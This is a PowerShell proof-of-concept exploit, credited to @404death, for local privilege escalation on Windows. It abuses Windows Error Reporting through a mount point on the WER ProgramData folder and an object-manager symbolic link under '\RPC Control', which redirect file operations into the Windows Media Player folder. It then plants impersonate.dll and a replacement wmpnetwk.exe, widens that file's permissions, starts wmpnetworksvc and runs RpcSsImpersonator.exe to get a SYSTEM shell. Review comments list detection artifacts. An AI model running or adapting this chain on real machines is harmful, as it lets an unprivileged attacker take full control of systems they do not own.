# @404death
# Files/directories deletion to SYSTEM shell
#
# What this script does, in execution order (read straight through; the order
# and the Start-Sleep calls between steps are part of the technique):
#   1. Loads NtApiDotNet (from the current directory) or the NtObjectManager
#      module, which provide the reparse-point primitives used below.
#   2. Runs the WER "QueueReporting" scheduled task and removes $path\Temp.
#   3. Creates a mount point "\??\$path" -> "\RPC Control" and an object-manager
#      symbolic link "\RPC Control\temp" -> "\??\$target2", so that "$path\temp"
#      resolves to $target2.
#   4. Creates and submits a WER report through wer.dll P/Invoke (Win32.WER).
#   5. Removes the reparse points and $path, copies impersonate.dll and
#      wmpnetwk.exe into $target2, grants NETWORK SERVICE FullControl on
#      wmpnetwk.exe, starts wmpnetworksvc and launches RpcSsImpersonator.exe.
#
# Host artifacts a defender can look for, all visible in the code below:
# reparse-point (mount point) creation on c:\programdata\microsoft\windows\wer,
# an object-manager symbolic link under "\RPC Control", schtasks /run of the
# WER QueueReporting task, file writes and a DACL change under
# "C:\Program Files\Windows Media Player", and a start of wmpnetworksvc.
### Load NtApiDotNet
Write-Host "[+] files/directories deletion to SYSTEM shell technique ."
Write-Host "[+] POC by @404death !!!!"
### Load NtApiDotNet
# Prefer NtApiDotNet.dll next to the script; otherwise fall back to the
# NtObjectManager module.
$PathCurrentDirectory = Get-Location
$PathNtApiDotNet = Join-Path -Path $PathCurrentDirectory -Child "NtApiDotNet.dll"
if (![System.IO.File]::Exists($PathNtApiDotNet)){
# NOTE(review): -ErrorAction Ignore suppresses a failed import, so the success
# message on the next line is printed even when the module was not loaded.
Import-Module NtObjectManager -ErrorAction Ignore
Write-Host "[*] Imported NtObjectManager module !"
# Write-Host "Hello"
} else {
# A failure to load the local DLL is terminating (-ErrorAction "Stop").
Import-Module "$PathNtApiDotNet" -ErrorAction "Stop"
Write-Host "[*] Loaded '$PathNtApiDotNet'"
Write-Host "[*] Imported NtObjectManager module !"
}
# $path     - WER directory that receives the mount point.
# $linkpath - object-manager directory that hosts the symbolic link.
# $target1  - declared here but not referenced anywhere below.
# $target2  - directory the symbolic link "$linkpath\temp" points to.
$path = "c:\programdata\microsoft\windows\wer"
$linkpath = "\RPC Control"
$target1 = "c:\windows\system32\wermgr.exe.local"
$target2 = "C:\Program Files\Windows Media Player"
# Trigger the WER QueueReporting scheduled task; its output is discarded.
schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" | Out-Null
Start-Sleep -s 1
# Clear the existing Temp subdirectory before the reparse points are placed;
# errors (e.g. directory absent) are silenced.
Remove-Item -Recurse -Force $path\Temp -ErrorAction SilentlyContinue | Out-Null
Start-Sleep -s 1
# Mount point: "\??\$path" -> "\RPC Control" (NT object-manager namespace).
[NtApiDotNet.NtFile]::CreateMountPoint("\??\$path", $linkpath, $null) | Out-Null
Write-Host "[+] Mount point created successfully on $linkpath"
# Object-manager symbolic link "\RPC Control\temp" -> "\??\$target2". The
# returned object is kept in $clink so the link stays alive until it is
# deleted explicitly below.
$clink = [NtApiDotNet.NtSymbolicLink]::Create("$linkpath\temp", "\??\$target2")
$clink | Out-Null
# [NtApiDotNet.NtSymbolicLink]::Create("$linkpath\temp", "\??\$target2") | Out-Null
# New-NtSymbolicLink "$linkpath\temp" "\??\$target2" | Out-Null
Write-Host "[+] Symbolic link created successfully on $target2"
#Start-Sleep -s 3
# Type definitions taken in part from MSDN documentation as well as from
# http://www.pinvoke.net/default.aspx/wer.WerReportSubmit and http://www.pinvoke.net/default.aspx/wer.WerReportCreate
# C# member definitions compiled by Add-Type into the type [Win32.WER]; the
# enums are nested, hence [Win32.WER+WER_REPORT_TYPE] below.
$MethodDefinition = @'
public enum WER_REPORT_TYPE
{
WerReportNonCritical,
WerReportCritical,
WerReportApplicationCrash,
WerReportApplicationHange,
WerReportKernel,
WerReportInvalid
}
public enum WER_CONSENT
{
WerConsentAlwaysPrompt = 4,
WerConsentApproved = 2,
WerConsentDenied = 3,
WerConsentMax = 5,
WerConsentNotAsked = 1
}
[DllImport("wer.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public extern static int WerReportCreate(string pwzEventType, WER_REPORT_TYPE repType, IntPtr pReportInformation, ref IntPtr phReportHandle);
[DllImport("wer.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public extern static int WerReportSubmit(IntPtr hReportHandle, int consent, int dwFlags, ref IntPtr pSubmitResult);
'@
Add-Type -MemberDefinition $MethodDefinition -Name 'WER' -Namespace 'Win32' -PassThru | Out-Null
$handle = 0 # Need to create the variable for the ref, so lets add this in so long.
# NOTE(review): on failure only a message is printed; execution continues and
# WerReportSubmit below is still called with whatever $handle holds (presumably
# still 0).
if( ([Win32.WER]::WerReportCreate("A",[Win32.WER+WER_REPORT_TYPE]::WerReportNonCritical, 0, [ref] $handle)) -ne 0 ){ # 0 in third argument is for blank pReportInformation
Write-Host "[-] Exploit failed. Couldn't create the report" -ForegroundColor Red
}
$result = 999 # Need to create the variable for the ref, so set it to a random value of 999.
if( [Win32.WER]::WerReportSubmit($handle, 1, 164, [ref]$result) -eq 0){ # 1 = WerConsentNotAsked, 36 = WER_SUBMIT_QUEUE | WER_SUBMIT_OUTOFPROCESS | WER_SUBMIT_ARCHIVE_PARAMETERS_ONLY -- NOTE(review): the comment describes 36 but the value passed is 164; confirm which dwFlags set is intended
Write-Host "[+] WER directory creation via WER report submission was a success!" -ForegroundColor Green
}
else {
Write-Host "[-] Exploit failed. Couldn't submit the report" -ForegroundColor Red
}
# schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" | Out-Null
# Write-Host "test123"
Start-Sleep -s 1
# Tear down: remove the mount point on $path, delete the object-manager link,
# then remove $path itself (errors silenced).
[NtApiDotNet.NtFile]::DeleteReparsePoint("\??\$path") | Out-Null
[NtApiDotNet.NtFile]::Delete("$linkpath\temp") | Out-Null
Remove-Item -Recurse -Force $path -ErrorAction SilentlyContinue | Out-Null
# Copy the payload files from the current directory into $target2. No
# -ErrorAction is given, so a missing source file produces a non-terminating
# error and the script continues.
Copy-Item ".\impersonate.dll" -Destination "$target2\" -Force
Start-Sleep -s 1
Copy-Item ".\wmpnetwk.exe" -Destination "$target2\wmpnetwk.exe" -Force
Start-Sleep -s 1
Write-Host "[+] Copied necessary files to $target2"
# icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant 'NT AUTHORITY\NETWORK SERVICE:F'
# DACL change: add an Allow/FullControl ACE for NETWORK SERVICE on the copied
# wmpnetwk.exe (PowerShell equivalent of the icacls line above).
$execfile = "C:\Program Files\Windows Media Player\wmpnetwk.exe"
$acl = Get-Acl $execfile
$user = "NT AUTHORITY\NETWORK SERVICE"
$AccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule($user,"FullControl","Allow")
$acl.SetAccessRule($AccessRule)
$acl | Set-Acl $execfile
Write-Host "[+] Set DACL Permission on payload exec File ..."
Start-Sleep -s 1
# Start the Windows Media Player Network Sharing Service; warnings and errors
# are suppressed, so the "triggered" message below does not confirm success.
Start-Service -Name "wmpnetworksvc" -WarningAction silentlyContinue -ErrorAction SilentlyContinue
# Display name only; assigned but not used (its only reference is commented out).
$wmpnetworksvcx = "Windows Media Player Network Sharing Service"
#$x = Write-Host "$wmpnetworksvcx" -ForegroundColor Red
Write-Host "[+] The Service : 'wmpnetworksvc' has been triggered !"
# NOTE(review): the DeleteReparsePoint call here is commented out; the mount
# point was actually removed in the tear-down step above, so the message
# below only reports that earlier removal.
#[NtApiDotNet.NtFile]::DeleteReparsePoint("\??\$path") | Out-Null
Write-Host "[+] Removed Mount Point . "
Write-Host "[+] Launched RpcSsImpersonator !"
# Runs RpcSsImpersonator.exe from the current directory (message above is
# printed before the launch).
.\RpcSsImpersonator.exe
############## POC by @404death !!!!